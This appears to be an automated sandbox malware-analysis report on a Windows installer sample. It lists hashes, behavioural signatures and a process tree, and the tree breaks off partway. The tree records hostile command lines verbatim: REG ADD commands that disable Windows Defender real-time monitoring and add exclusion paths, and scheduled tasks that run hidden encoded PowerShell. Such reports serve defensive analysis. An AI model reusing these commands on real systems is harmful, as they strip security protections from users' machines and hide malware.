Analysis
- max time kernel: 130s
- max time network: 133s
- platform: windows7_x64
- resource: win7-20221111-en
- resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
- submitted: 07/01/2023, 18:34

Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: file.exe, Resource: win7-20221111-en)

General
- Target: file.exe
- Size: 7.2MB
- MD5: f5e2fb884e9b4c4e9364fc286727340a
- SHA1: 92819865c3e7c9d449f63e49ddef8d1c303080ff
- SHA256: 6023edbce6f5c541aa1703e2a34a0dcfe1ff7e189e1705c9a1c4486da8cab14c
- SHA512: dc5b14d3c17df918ecaaafa88f4429e95c11621c84118fb726f2b0b2d15ca4e86b5416e343c9e998c298e4e55c1439541984f3d69bd9a1a7cfcef397d504dbfe
- SSDEEP: 196608:91O/sruHn4TrS9xWK12ZszTJvY7/UvEoVt:3OeuHMraMXa+FIt
Malware Config
Signatures
Modifies Windows Defender Real-time Protection settings (signature title recovered from the process-tree tag; each row below is reported twice, once per reg.exe invocation)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe

Windows security bypass (signature title recovered from the process-tree tag; duplicate rows collapsed)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BjvgkLgoU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ETlMoSXAKBfU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xOXloLrYuJMznnLuiyR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lkHAEDYevLoxC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jtlBjnUcyHUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\EgLUknTySUlyFxVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\UEaXSoKYgiRfepGU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BjvgkLgoU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ETlMoSXAKBfU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xOXloLrYuJMznnLuiyR = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\lkHAEDYevLoxC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jtlBjnUcyHUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\EgLUknTySUlyFxVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\UEaXSoKYgiRfepGU = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR = "0" | reg.exe
Blocklisted process makes network request 1 IoCs
flow | pid | Process
21 | 880 | rundll32.exe

Executes dropped EXE 4 IoCs
pid | Process
1460 | Install.exe
1852 | Install.exe
680 | dfgYjxP.exe
808 | vclgNht.exe

Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Control Panel\International\Geo\Nation | vclgNht.exe

Loads dropped DLL 12 IoCs
pid | Process (number of times reported)
1472 | file.exe (1)
1460 | Install.exe (4)
1852 | Install.exe (3)
880 | rundll32.exe (4)
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops Chrome extension 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | vclgNht.exe
Drops file in System32 directory 19 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE (reported 4 times, once per powershell.EXE process)
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | vclgNht.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | vclgNht.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D | vclgNht.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D | vclgNht.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | vclgNht.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | vclgNht.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 | vclgNht.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 | vclgNht.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | vclgNht.exe
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | dfgYjxP.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | dfgYjxP.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | dfgYjxP.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | rundll32.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | vclgNht.exe

Drops file in Program Files directory 13 IoCs
description | ioc | Process
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | vclgNht.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | vclgNht.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | vclgNht.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | vclgNht.exe
File created | C:\Program Files (x86)\xOXloLrYuJMznnLuiyR\dasdwCI.xml | vclgNht.exe
File created | C:\Program Files (x86)\xOXloLrYuJMznnLuiyR\QLwqyXB.dll | vclgNht.exe
File created | C:\Program Files (x86)\BjvgkLgoU\ErZeYfF.xml | vclgNht.exe
File created | C:\Program Files (x86)\BjvgkLgoU\LUMjPj.dll | vclgNht.exe
File created | C:\Program Files (x86)\ETlMoSXAKBfU2\ZLQUJMcjgPPjm.dll | vclgNht.exe
File created | C:\Program Files (x86)\ETlMoSXAKBfU2\JSfpubN.xml | vclgNht.exe
File created | C:\Program Files (x86)\lkHAEDYevLoxC\SQgfSIs.dll | vclgNht.exe
File created | C:\Program Files (x86)\lkHAEDYevLoxC\WZEqTFX.xml | vclgNht.exe
File created | C:\Program Files (x86)\jtlBjnUcyHUn\sUDZCCk.dll | vclgNht.exe

Drops file in Windows directory 4 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\boqjQyEgeBagneJBps.job | schtasks.exe
File created | C:\Windows\Tasks\SqCKrsanZcXdLkunv.job | schtasks.exe
File created | C:\Windows\Tasks\eTxnbZekOUBRWtJ.job | schtasks.exe
File created | C:\Windows\Tasks\epwDgMxkovfKwwbuy.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1588, 2020, 1092, 1872, 1044, 732, 1856, 1788, 1756, 532, 848, 1856, 912 | schtasks.exe (one entry per invocation; PID 1856 is listed twice)

Enumerates system info in registry 2 TTPs 4 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Modifies data under HKEY_USERS 64 IoCs
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid | Process (number of times reported)
1352 | powershell.EXE (3)
1092 | powershell.EXE (3)
1700 | powershell.EXE (3)
1008 | powershell.EXE (3)
808 | vclgNht.exe (17)

Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 1352 | powershell.EXE
Token: SeDebugPrivilege | 1092 | powershell.EXE
Token: SeDebugPrivilege | 1700 | powershell.EXE
Token: SeDebugPrivilege | 1008 | powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target (number of times reported)
PID 1472 wrote to memory of 1460 | 1472 | file.exe | 28 (7)
PID 1460 wrote to memory of 1852 | 1460 | Install.exe | 29 (7)
PID 1852 wrote to memory of 1932 | 1852 | Install.exe | 31 (7)
PID 1852 wrote to memory of 984 | 1852 | Install.exe | 33 (7)
PID 1932 wrote to memory of 596 | 1932 | forfiles.exe | 35 (7)
PID 984 wrote to memory of 1648 | 984 | forfiles.exe | 36 (7)
PID 596 wrote to memory of 904 | 596 | cmd.exe | 37 (7)
PID 1648 wrote to memory of 1784 | 1648 | cmd.exe | 38 (7)
PID 1648 wrote to memory of 912 | 1648 | cmd.exe | 40 (6)
PID 596 wrote to memory of 1044 | 596 | cmd.exe | 39 (2)
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Users\Admin\AppData\Local\Temp\7zS2B0.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Users\Admin\AppData\Local\Temp\7zS723.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:596 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:904
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1044
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1784
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:912
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzgdJJbPO" /SC once /ST 03:05:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzgdJJbPO"4⤵PID:808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzgdJJbPO"4⤵PID:564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "boqjQyEgeBagneJBps" /SC once /ST 19:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR\jugYpljNMwYtfWN\dfgYjxP.exe\" JW /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1872
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {737C5EC4-6648-49F9-9210-C1D158982162} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]1⤵PID:1048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1564
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1528
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1676
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1500
-
-
-
[PID 1228] C:\Windows\system32\gpscript.exe
  cmdline: gpscript.exe /RefreshSystemParam

[PID 1256] C:\Windows\system32\taskeng.exe
  cmdline: taskeng.exe {EC8C5FBA-A9E7-43A1-95F9-FEC130087074} S-1-5-18:NT AUTHORITY\System:Service:
    [PID 680] C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR\jugYpljNMwYtfWN\dfgYjxP.exe
      cmdline: C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR\jugYpljNMwYtfWN\dfgYjxP.exe JW /site_id 525403 /S
      - Executes dropped EXE
      - Drops file in System32 directory
        [PID 1044] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /CREATE /TN "ggmGZAWqc" /SC once /ST 03:30:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          (the /TR payload decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
          - Creates scheduled task(s)
        [PID 1936] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /run /I /tn "ggmGZAWqc"
        [PID 1576] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /DELETE /F /TN "ggmGZAWqc"
        [PID 1564] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            [PID 1016] C:\Windows\SysWOW64\reg.exe
              cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
              - Modifies Windows Defender Real-time Protection settings
        [PID 1736] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
            [PID 880] C:\Windows\SysWOW64\reg.exe
              cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              - Modifies Windows Defender Real-time Protection settings
        [PID 732] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /CREATE /TN "gkfqRUelh" /SC once /ST 13:29:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          (the /TR payload decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
          - Creates scheduled task(s)
        [PID 776] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /run /I /tn "gkfqRUelh"
        [PID 1884] C:\Windows\SysWOW64\schtasks.exe
          cmdline: schtasks /DELETE /F /TN "gkfqRUelh"
        [PID 1216] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:32
            [PID 1748] C:\Windows\SysWOW64\reg.exe
              cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:32
              - Windows security bypass
        [PID 1656] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:64
            [PID 748] C:\Windows\SysWOW64\reg.exe
              cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:64
              - Windows security bypass
        [PID 1016] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:32
            [PID 2000] C:\Windows\SysWOW64\reg.exe
              cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:32
        [PID 876] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:64
            [PID 1696] C:\Windows\SysWOW64\reg.exe
              cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:64
        [PID 820] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd /C copy nul "C:\Windows\Temp\UEaXSoKYgiRfepGU\qolLkWyK\AsmjfGIpJVBFTUvQ.wsf"
        [PID 776] C:\Windows\SysWOW64\wscript.exe
          cmdline: wscript "C:\Windows\Temp\UEaXSoKYgiRfepGU\qolLkWyK\AsmjfGIpJVBFTUvQ.wsf"
          - Modifies data under HKEY_USERS
            [PID 1152] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjvgkLgoU" /t REG_DWORD /d 0 /reg:32
              - Windows security bypass
            [PID 1596] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjvgkLgoU" /t REG_DWORD /d 0 /reg:64
              - Windows security bypass
            [PID 1680] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ETlMoSXAKBfU2" /t REG_DWORD /d 0 /reg:32
              - Windows security bypass
            [PID 1008] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ETlMoSXAKBfU2" /t REG_DWORD /d 0 /reg:64
              - Windows security bypass
            [PID 1720] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jtlBjnUcyHUn" /t REG_DWORD /d 0 /reg:32
              - Windows security bypass
            [PID 608] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jtlBjnUcyHUn" /t REG_DWORD /d 0 /reg:64
              - Windows security bypass
            [PID 284] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkHAEDYevLoxC" /t REG_DWORD /d 0 /reg:32
              - Windows security bypass
            [PID 2020] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkHAEDYevLoxC" /t REG_DWORD /d 0 /reg:64
            [PID 1288] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR" /t REG_DWORD /d 0 /reg:32
              - Windows security bypass
            [PID 1588] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR" /t REG_DWORD /d 0 /reg:64
              - Windows security bypass
            [PID 1656] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EgLUknTySUlyFxVB" /t REG_DWORD /d 0 /reg:32
              - Windows security bypass
            [PID 1016] C:\Windows\SysWOW64\reg.exe
              cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EgLUknTySUlyFxVB" /t REG_DWORD /d 0 /reg:64
              - Windows security bypass
            [PID 1696] C:\Windows\SysWOW64\reg.exe
